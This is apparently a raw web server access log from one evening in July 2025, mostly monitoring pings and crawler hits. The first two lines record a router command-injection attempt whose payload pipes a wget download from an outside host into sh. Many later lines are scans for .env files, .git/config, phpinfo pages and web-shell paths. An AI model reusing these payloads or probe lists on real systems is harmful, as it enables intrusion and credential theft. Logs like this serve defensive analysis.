87.121.84.34 - - [01/Jul/2025:20:00:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
87.121.84.34 - - [01/Jul/2025:20:00:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
108.165.153.6 - - [01/Jul/2025:20:00:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:20:00:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:01:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [01/Jul/2025:20:02:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:20:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.165.153.6 - - [01/Jul/2025:20:03:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:20:03:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:04:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:20:05:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:20:05:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:20:05:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:20:05:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
95.214.53.84 - - [01/Jul/2025:20:05:25 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
95.214.53.84 - - [01/Jul/2025:20:05:35 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
204.76.203.206 - - [01/Jul/2025:20:05:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:05:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:06:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [01/Jul/2025:20:08:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [01/Jul/2025:20:08:35 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Jul/2025:20:08:46 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:08:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Jul/2025:20:09:33 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:09:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Jul/2025:20:10:00 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Jul/2025:20:10:00 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Jul/2025:20:10:21 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Jul/2025:20:10:42 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
45.156.130.47 - - [01/Jul/2025:20:10:53 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
93.174.93.12 - - [01/Jul/2025:20:10:54 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:10:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Jul/2025:20:11:05 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.251.153.117 - - [01/Jul/2025:20:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.174 - - [01/Jul/2025:20:11:34 +0200] "GET /ftp.modeinstitut-berlin.de/log/ HTTP/1.1" 404 347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:11:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Jul/2025:20:12:06 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:12:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:13:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:14:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.161.43 - - [01/Jul/2025:20:15:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
165.227.161.43 - - [01/Jul/2025:20:15:01 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
176.65.148.183 - - [01/Jul/2025:20:15:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.backup HTTP/1.1" 404 316 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.old HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.development HTTP/1.1" 404 321 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.save HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.save HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.development.local HTTP/1.1" 404 327 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.staging HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.prod HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:37 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:38 +0200] "GET /.env.test HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:39 +0200] "GET /.env.preprod HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:39 +0200] "GET /.env.production.local HTTP/1.1" 404 326 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:40 +0200] "GET /.env.local HTTP/1.1" 404 315 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:40 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:40 +0200] "GET /adminer/.env HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:40 +0200] "GET /.env.save.1 HTTP/1.1" 404 316 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /.env.ci HTTP/1.1" 404 312 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /.env.default HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /.env.dist HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /administrator/.env HTTP/1.1" 404 323 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /.env.stage HTTP/1.1" 404 315 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:41 +0200] "GET /build/.env HTTP/1.1" 404 315 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /env/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /.env.live HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /blog/.env HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /database/.env HTTP/1.1" 404 318 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /dev/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /core/.env HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /bootstrap/.env HTTP/1.1" 404 319 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /old/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /prod/.env HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /staging/.env HTTP/1.1" 404 317 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /.env.dev HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:42 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:43 +0200] "GET /test/.env HTTP/1.1" 404 314 "-" "Python/3.11 aiohttp/3.12.6"
142.111.77.70 - - [01/Jul/2025:20:15:43 +0200] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Python/3.11 aiohttp/3.12.6"
212.91.247.32 - - [01/Jul/2025:20:15:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.193.21 - - [01/Jul/2025:20:16:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
68.183.193.21 - - [01/Jul/2025:20:16:04 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [01/Jul/2025:20:16:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [01/Jul/2025:20:17:21 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:17:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:18:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:19:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:20:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:20:21:48 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:21:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [01/Jul/2025:20:22:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.37"
212.91.247.32 - - [01/Jul/2025:20:22:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [01/Jul/2025:20:23:22 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:23:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [01/Jul/2025:20:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:24:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Jul/2025:20:25:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; ONE E1003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:25:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:26:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:27:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:29:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:30:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:31:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [01/Jul/2025:20:32:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:32:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:33:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:34:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:35:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.152 - - [01/Jul/2025:20:36:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:16 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:16 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:16 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:17 +0200] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:17 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:17 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [01/Jul/2025:20:36:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
212.91.247.32 - - [01/Jul/2025:20:36:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [01/Jul/2025:20:37:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:37:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.173.87 - - [01/Jul/2025:20:38:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.173.87 - - [01/Jul/2025:20:38:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:38:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:40:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:41:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.182.252.13 - - [01/Jul/2025:20:42:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
147.182.252.13 - - [01/Jul/2025:20:42:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.81/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:42:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:43:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.125 - - [01/Jul/2025:20:44:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.125 - - [01/Jul/2025:20:44:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.125 - - [01/Jul/2025:20:44:48 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.125 - - [01/Jul/2025:20:44:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.125 - - [01/Jul/2025:20:44:52 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.125 - - [01/Jul/2025:20:44:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.142.125.125 - - [01/Jul/2025:20:44:55 +0200] "GET /security.txt HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [01/Jul/2025:20:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:46:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.243.78.32 - - [01/Jul/2025:20:47:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.243.78.32 - - [01/Jul/2025:20:47:33 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
162.243.78.32 - - [01/Jul/2025:20:47:33 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
162.243.78.32 - - [01/Jul/2025:20:47:33 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.78.32 - - [01/Jul/2025:20:47:33 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.78.32 - - [01/Jul/2025:20:47:33 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.78.32 - - [01/Jul/2025:20:47:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.243.78.32 - - [01/Jul/2025:20:47:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.243.78.32 - - [01/Jul/2025:20:47:34 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.78.32 - - [01/Jul/2025:20:47:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.78.32 - - [01/Jul/2025:20:47:34 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
80.251.153.117 - - [01/Jul/2025:20:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:20:47:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
